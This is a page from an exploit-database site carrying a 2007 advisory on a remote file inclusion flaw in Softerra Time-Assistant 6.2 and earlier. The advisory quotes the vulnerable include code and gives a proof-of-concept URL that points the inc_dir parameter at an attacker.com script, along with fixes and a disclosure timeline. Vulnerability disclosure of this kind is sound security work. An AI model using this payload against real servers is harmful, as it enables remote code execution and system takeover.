0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Softerra Time-Assistant <= 6.2 (inc_dir) Remote File Inclusion Vuln
=================================================================== Softerra Time-Assistant <= 6.2 (inc_dir) Remote File Inclusion Vuln =================================================================== ____________________ ___ ___ ________ \_ _____/\_ ___ \ / | \\_____ \ | __)_ / \ \// ~ \/ | \ | \\ \___\ Y / | \ /_______ / \______ /\___|_ /\_______ / \/ \/ \/ \/ .OR.ID ECHO_ADV_80$2007 ----------------------------------------------------------------------------------------- [ECHO_ADV_80$2007] Softerra Time-Assistant <= 6.2 (inc_dir) Remote File Inclusion Vulnerability ----------------------------------------------------------------------------------------- Author : M.Hasran Addahroni Date : March, 29th 2007 Location : Australia, Sydney Critical Lvl : Dangerous Impact : System access Where : From Remote --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : Time-Assistant version : <= 6.2 Time-Assistant Standard, Time-Assistant Enterprise, Time-Assistant light Vendor : http://www.time-assistant.com Description : Time-Assistant - Web based time tracking software for Internet/Intranet featuring employee timesheets and various reports and project management tools that include salary calculation, invoices and expenses, online services and PDA package. Time-Assistant is professional timesheet software for your business. It is a daily time tracking solution designed to reduce the drudgery of recording, analyzing and reporting associated with everyday working routine. With Time-Assistant you can easily manage employee timesheets and expenses, calculate salaries, prepare project estimates, get invoices based on personal or client work rates. --------------------------------------------------------------------------- Vulnerability: ~~~~~~~~~~~~~ - Invalid include function at lib/timesheet.class.php : ----------------lib/timesheet.class.php------------------- ... include ($inc_dir . "database.inc.php"); include ($lib_dir . "sqlstorage.class.php"); include ($lib_dir . "lib.php"); include ($lib_dir . "timesheet.lib.php"); ... ---------------------------------------------------------------- Input passed to the "inc_dir" and "lib_dir" parameter in lib/timesheet.class.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources. Successful exploitation requires that "register_globals" is enabled. Poc/Exploit: ~~~~~~~~~ http://www.target.com/[Time-Assistant_path]/lib/timesheet.class.php?inc_dir=http://attacker.com/evil? Solution: ~~~~~~ - Edit the source code to ensure that input is properly verified. - Turn off register_globals Notification: ~~~~~~ - 28-03-2007 bugs found - 28-03-2007 vendor contacted but no response - 29-03-2007 advisory released --------------------------------------------------------------------------- Shoutz: ~~~~ ~ ping - my dearest wife, and my little son, for all the luv the tears n the breath ~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,negative, str0ke (for the best comments) ~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw ~ SinChan,h4ntu,cow_1seng,sakitjiwa, m_beben, rizal, cR4SH3R, madkid, kuntua, stev_manado, nofry, x16 -------------------------------- [ EOF ] ---------------------------------- # 0day.today [2024-09-17] #